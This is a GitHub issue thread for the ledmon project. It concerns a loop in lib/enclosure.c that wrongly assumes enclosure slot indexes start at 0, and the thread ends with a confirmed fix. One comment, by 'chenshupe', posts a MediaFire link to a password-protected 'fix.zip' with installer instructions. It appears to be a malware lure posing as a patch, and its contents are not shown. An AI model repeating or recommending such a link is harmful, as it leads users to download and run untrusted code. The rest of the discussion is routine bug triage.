md-raid-utilities/ledmon #247: lib/enclosure.c Produces errors, if Enclosure Indexes do not start by 0

sHorst, 2024-08-28:
https://github.com/intel/ledmon/blob/bdce02a4c5211c9059c49f253b782df62d00317e/src/lib/enclosure.c#L144C2-L152C3

In the referenced Lines in lib/enclosure.c the code assumes, that Indexes start at 0 and end at slots_count, which is not allways the case. The other code can handle the miss, but this code produces errors, for slot 0 and will not update the last device.

```
/* If there is an associated block device with a slot, we need to update the block ibpi */
	for (int i = 0; i < enclosure->slots_count; i++) {
		struct block_device *bd = enclosure_get_block_device(enclosure, i);
		struct ses_slot *s_slot = find_enclosure_slot_by_index(enclosure, i);

		if (bd && s_slot) {
			bd->ibpi_prev = bd->ibpi;
			bd->ibpi = s_slot->ibpi_status;
		}
	}
```

chenshupe, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

bkucman, 2024-08-30:
Hi,

@tasleson  I see you implemented this change in commit https://github.com/intel/ledmon/commit/869181077ce692ff12f82775766eac5e4410091a could you look at this issue?
this change may also be related to the observed behavior in issue https://github.com/intel/ledmon/issues/246

Thanks,
Blazej

tasleson, 2024-09-06:
@bkucman I'll take a look at this

mtkaczyk, 2024-09-23:
@sHorst could you please confirm that #251 fixes issue for you?

sHorst, 2024-09-23:
yes, it fixed the problem, thx

closed 2024-09-24 by ktanska